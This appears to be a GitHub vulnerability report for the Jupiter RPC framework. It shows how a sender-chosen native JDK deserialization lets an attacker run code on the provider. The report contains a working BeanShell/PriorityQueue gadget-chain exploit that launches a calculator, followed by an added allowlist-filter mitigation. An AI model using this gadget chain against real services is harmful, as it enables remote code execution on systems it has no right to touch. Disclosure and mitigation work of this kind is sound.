
Another approach capable of achieving RCE attacks #114

@adv851

Description

Problem Description

As Jupiter's deserialization protocol is dictated by the sender's request configuration, attackers can induce the Provider side to employ the Native JDK protocol for deserializing carefully crafted serialized data, thereby accomplishing an RCE attack.

Reproduce

Provider

We employed the built-in module "jupiter-example" of the project to set up the test environment for the attack. The JDK version used is 8u65.
(screenshot: 2023-11-02 22 54 28)

POC
(screenshot: 2023-11-02 22 46 53)

At line 66, change the deserialization protocol to Native JAVA, and at line 70, replace the malicious injection object (there are several known candidate injection objects; one is selected here as an example, and this chain depends on the following JAR files).

```xml
<dependency>
    <groupId>org.beanshell</groupId>
    <artifactId>bsh</artifactId>
    <version>2.0b5</version>
</dependency>
```
```java
public static Object getBshObject() throws Exception {
    // BeanShell payload

    String payload =
            "compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{" +
                    Strings.join( // does not support spaces in quotes
                            Arrays.asList("open /System/Applications/Calculator.app".replaceAll("\\\\","\\\\\\\\").replaceAll("\"","\\\"").split(" ")),
                            ",", "\"", "\"") +
                    "}).start();return new Integer(1);}";

    // Create Interpreter
    Interpreter i = new Interpreter();

    // Evaluate payload
    i.eval(payload);

    // Create InvocationHandler
    XThis xt = new XThis(i.getNameSpace(), i);
    InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt);

    // Create Comparator Proxy
    Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler);

    // Prepare Trigger Gadget (will call Comparator.compare() during deserialization)
    final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
    Object[] queue = new Object[] {1,1};
    Reflections.setFieldValue(priorityQueue, "queue", queue);
    Reflections.setFieldValue(priorityQueue, "size", 2);

    return priorityQueue;
}
```

Attack Impact

Capable of executing an RCE attack; in this attack test it is demonstrated by launching the calculator application.
(screenshot: 2023-11-02 22 51 49)
(screenshot: 2023-11-02 22 52 28)
(screenshot: 2023-11-02 22 52 50)
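As an added mitigation example (editor's code, not Jupiter's, and not from the issue author): when a provider cannot avoid JDK-native deserialization of request bytes, an explicit class allowlist via `java.io.ObjectInputFilter` (JDK 9+, backported to 8u121+ as `sun.misc.ObjectInputFilter`; the 8u65 used above has no filter at all) rejects the `PriorityQueue`/proxy trigger before any gadget runs. The allowlist contents are a hypothetical set for a service that only exchanges strings, integers and lists; the real fix remains not letting the sender choose the provider's serializer.

```java
import java.io.*;
import java.util.*;

public final class AllowlistDeserializer {
    // Hypothetical allowlist: only the DTO types this service actually exchanges.
    // Number is needed because Integer's serialized class descriptor chain includes it.
    private static final Set<String> ALLOWED = new HashSet<>(Arrays.asList(
            "java.lang.String", "java.lang.Integer", "java.lang.Number", "java.util.ArrayList"));

    static final ObjectInputFilter FILTER = info -> {
        Class<?> c = info.serialClass();
        if (c == null) {
            // Depth/reference-count callbacks arrive with a null class; cap stream complexity.
            return (info.depth() > 10 || info.references() > 1000)
                    ? ObjectInputFilter.Status.REJECTED : ObjectInputFilter.Status.UNDECIDED;
        }
        while (c.isArray()) c = c.getComponentType();
        if (c.isPrimitive()) return ObjectInputFilter.Status.ALLOWED;
        // Dynamic proxies (such as the Comparator in the gadget above) never appear in the allowlist.
        return ALLOWED.contains(c.getName())
                ? ObjectInputFilter.Status.ALLOWED : ObjectInputFilter.Status.REJECTED;
    };

    // Deserialize request bytes; a rejected class surfaces as InvalidClassException
    // before the object is constructed, so PriorityQueue.readObject never runs.
    public static Object readChecked(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.setObjectInputFilter(FILTER);
            return in.readObject();
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) { out.writeObject(o); }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Constructed samples: a benign DTO passes; a PriorityQueue (the trigger type) is rejected.
        System.out.println("accepted: " + readChecked(serialize(new ArrayList<>(Arrays.asList("ok", 1)))));
        try {
            readChecked(serialize(new PriorityQueue<>(Arrays.asList(1, 2))));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```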
